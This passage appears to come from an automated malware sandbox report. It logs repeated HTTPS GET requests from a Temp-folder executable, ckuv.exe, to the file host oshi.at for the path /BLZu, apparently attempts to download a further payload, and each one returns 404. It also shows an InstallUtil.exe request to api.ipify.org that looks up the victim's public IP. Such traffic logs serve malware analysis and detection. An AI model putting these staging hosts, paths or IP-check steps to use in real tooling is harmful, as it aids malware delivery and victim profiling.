                                                                                                        2025-01-13 02:01:59 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:00 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:00 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:00 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.2.449766194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:01 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:02 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:01 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:02 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        21192.168.2.449777194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:03 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:04 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:04 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:04 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        22192.168.2.449795194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:06 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:06 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:06 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:06 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        23192.168.2.449809194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:08 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:09 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:09 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:09 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        24192.168.2.449820194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:10 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:10 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:10 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:10 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        25192.168.2.449829194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:12 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:13 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:13 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:13 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        26192.168.2.449836104.26.12.2054436756C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:13 UTC155OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                        Host: api.ipify.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-13 02:02:13 UTC424INHTTP/1.1 200 OK
                                                                                                        Date: Mon, 13 Jan 2025 02:02:13 GMT
                                                                                                        Content-Type: text/plain
                                                                                                        Content-Length: 12
                                                                                                        Connection: close
                                                                                                        Vary: Origin
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 9011cd87ab449e17-EWR
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1997&rtt_var=752&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1452736&cwnd=186&unsent_bytes=0&cid=c3e2c456d621c7c4&ts=371&x=0"
                                                                                                        2025-01-13 02:02:13 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                        Data Ascii: 8.46.123.189


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        27192.168.2.449845194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:14 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:15 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:15 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:15 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        28192.168.2.449857194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:16 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:17 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:17 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:17 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        29192.168.2.449870194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:18 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:19 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:19 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:19 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        30192.168.2.449884194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:20 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:21 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:21 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:21 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        31192.168.2.449897194.15.112.2484437816C:\Users\user\AppData\Local\Temp\ckuv.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-13 02:02:22 UTC162OUTGET /BLZu HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                        Host: oshi.at
                                                                                                        2025-01-13 02:02:23 UTC158INHTTP/1.1 404 Not Found
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 13 Jan 2025 02:02:23 GMT
                                                                                                        Content-Type: text/html;charset=UTF-8
                                                                                                        Content-Length: 1849
                                                                                                        Connection: close
                                                                                                        2025-01-13 02:02:23 UTC1185INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up
                                                                                                        2025-01-13 02:02:23 UTC664INData Raw: 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 2f 63 6d 64 22 3e 43 6f 6d 6d 61 6e 64 2d 6c 69 6e 65 20 69 6e 74 65 72 66 61 63 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 22 20 68 72 65 66 3d 22 2f 73 68 61 72 65 78 22 3e 53 68 61 72 65 58 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 63 6c 61 73
